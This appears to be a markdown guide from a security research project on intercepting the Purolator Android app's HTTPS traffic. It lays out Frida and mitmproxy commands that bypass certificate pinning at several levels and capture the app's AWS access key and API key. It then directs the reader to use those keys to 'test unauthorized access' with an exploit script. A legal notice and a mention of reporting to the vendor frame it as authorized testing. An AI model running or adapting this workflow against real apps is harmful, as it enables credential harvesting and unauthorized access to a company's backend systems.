# Purolator API Interception Guide ## ⚠️ SSL Pinning: YES, YOU NEED TO BYPASS IT! **Answer: YES**, the Purolator app uses OkHttp3 which has `CertificatePinner` support. You'll need to bypass SSL pinning to intercept HTTPS traffic. --- ## 🎯 Quick Start (3 Options) ### Option 1: Complete Interception (RECOMMENDED) **Does everything: SSL bypass + credential capture** ```bash frida -U -f com.purolator.mobileapp -l complete_intercept.js --no-pause ``` **What it does:** - ✅ Bypasses SSL pinning automatically - ✅ Captures AWS Access Key ID - ✅ Captures API Key - ✅ Logs all tracking API requests - ✅ Monitors credential decryption **No additional setup needed!** Just run Frida and track a shipment. --- ### Option 2: Separate SSL Bypass + Interception **For when you want to use mitmproxy separately** **Step 1: Run SSL bypass** ```bash frida -U -f com.purolator.mobileapp -l ssl_pinning_bypass.js --no-pause ``` **Step 2: In another terminal, run mitmproxy** ```bash mitmproxy --mode transparent --showhost ``` **Step 3: In another terminal, run request interceptor** ```bash frida -U com.purolator.mobileapp -l intercept_tracking.js ``` --- ### Option 3: mitmproxy Only (if Frida isn't working) **Requires root and more setup** 1. Install mitmproxy certificate on device 2. Use Magisk + MagiskTrustUserCerts module 3. Or use Xposed + JustTrustMe module --- ## 📱 Device Setup ### Prerequisites 1. **Rooted Android device** or emulator (Genymotion/Android Studio) 2. **Frida installed**: `pip install frida-tools` 3. **frida-server running** on device 4. **Purolator app installed** ### Quick Device Check ```bash # Check if device is connected adb devices # Check if frida is working frida-ps -U # Should see list of running processes ``` --- ## 🔧 Detailed Setup ### 1. Install Frida Server on Device ```bash # Download frida-server for your device # Check architecture first adb shell getprop ro.product.cpu.abi # Output: arm64-v8a, armeabi-v7a, x86, or x86_64 # Download matching version from: # https://github.com/frida/frida/releases # Example for arm64: adb push frida-server-16.1.4-android-arm64 /data/local/tmp/frida-server adb shell "chmod 755 /data/local/tmp/frida-server" adb shell "/data/local/tmp/frida-server &" ``` ### 2. Verify Frida is Working ```bash frida-ps -U # Should see Android processes ``` ### 3. Run Complete Interception ```bash frida -U -f com.purolator.mobileapp -l complete_intercept.js --no-pause ``` ### 4. Use the App 1. Open Purolator app 2. Go to "Track Shipment" 3. Enter: **520127751300** 4. Watch your terminal! --- ## 🎯 What You'll Capture ### Expected Output: ``` ═══════════════════════════════════════════════════════════════════════ 🎯 TRACKING API REQUEST ═══════════════════════════════════════════════════════════════════════ URL: https://api.purolator.com/tracking-ext/v1/search Method: POST Time: 2025-11-08T12:34:56.789Z 📋 HEADERS: Authorization: AWS4-HMAC-SHA256 Credential=AKIAIOSFODNN7EXAMPLE/20251108/us-east-1/execute-api/aws4_request, SignedHeaders=content-type;host;x-amz-date;x-api-key, Signature=abc123def456... X-API-Key: okpCK3fFSk645Ev3 Content-Type: application/json Host: api.purolator.com X-Amz-Date: 20251108T123456Z 📦 REQUEST BODY: {"shipmentNumber":"520127751300"} 🔑 EXTRACTED CREDENTIALS: ═══════════════════════════════════════════════════════════════════════ ✓ AWS Access Key ID: AKIAIOSFODNN7EXAMPLE ⚠️ CRITICAL: Save this AWS key for POC! ✓ API Key: okpCK3fFSk645Ev3 ═══════════════════════════════════════════════════════════════════════ ``` --- ## 🔐 Why SSL Pinning Bypass is Needed The Purolator app uses **OkHttp3** with `CertificatePinner`, which: 1. **Validates certificate chains** against hardcoded pins 2. **Blocks man-in-the-middle proxies** like mitmproxy 3. **Prevents interception** even with root access Without bypass, you'll see: ``` javax.net.ssl.SSLPeerUnverifiedException: Certificate pinning failure! ``` **Our scripts handle this automatically!** --- ## 🐛 Troubleshooting ### Problem: "Failed to spawn: unable to find application" **Solution:** Check package name ```bash adb shell pm list packages | grep purolator # Should show: package:com.purolator.mobileapp ``` ### Problem: "Failed to attach: connection closed" **Solution:** Restart frida-server ```bash adb shell "pkill frida-server" adb shell "/data/local/tmp/frida-server &" ``` ### Problem: "SSL pinning still blocking" **Solution:** Use `complete_intercept.js` instead of individual scripts ### Problem: "No output when tracking" **Solution:** 1. Make sure app is in foreground 2. Check if request actually happened 3. Try with `-f` flag to spawn fresh app instance --- ## 🎓 Understanding SSL Pinning Bypass Our script bypasses pinning at **6 different levels**: 1. **CertificatePinner.check()** - Main OkHttp pinning 2. **TrustManager** - Accepts all certificates 3. **HostnameVerifier** - Skips hostname validation 4. **Network Security Config** - Bypasses Android 7+ restrictions 5. **Conscrypt SSLEngine** - Low-level SSL validation 6. **App-specific checks** - Any custom Purolator code **Result:** Complete SSL interception capability! --- ## 📊 Success Metrics You've successfully intercepted when you see: - ✅ `[+] SSL Pinning bypassed for: api.purolator.com` - ✅ `🎯 TRACKING API REQUEST` with full details - ✅ `AWS Access Key ID: AKIA...` extracted - ✅ Request body with your tracking number --- ## 🚀 Next Steps After Successful Interception 1. **Save AWS credentials** from terminal output 2. **Update POC script** with captured AWS keys 3. **Test unauthorized access** with `poc_tracking_exploit.py` 4. **Document findings** for security report 5. **Report to Purolator** security team --- ## 📝 Files Reference | File | Purpose | When to Use | | --------------------------- | -------------------- | -------------------------------- | | `complete_intercept.js` | SSL bypass + capture | **Start here** - does everything | | `ssl_pinning_bypass.js` | SSL bypass only | When using external tools | | `intercept_tracking.js` | Request capture only | When SSL already bypassed | | `dynamic_analysis_guide.py` | Theory/documentation | For understanding methods | --- ## ⚠️ Legal Notice This is for **authorized security testing only**. Ensure you have: - Written authorization to test - Legal permission to intercept traffic - Proper security disclosure process **DO NOT** use this for unauthorized access to Purolator systems. --- ## 🎯 Summary **Q: Do I need SSL pinning bypass?** **A: YES** - The app uses OkHttp3 with certificate pinning. **Q: Which script should I use?** **A: `complete_intercept.js`** - It does everything automatically. **Q: What will I get?** **A: AWS credentials + API key** - Everything needed for full exploitation POC. **Ready?** Run this command and track a shipment: ```bash frida -U -f com.purolator.mobileapp -l complete_intercept.js --no-pause ```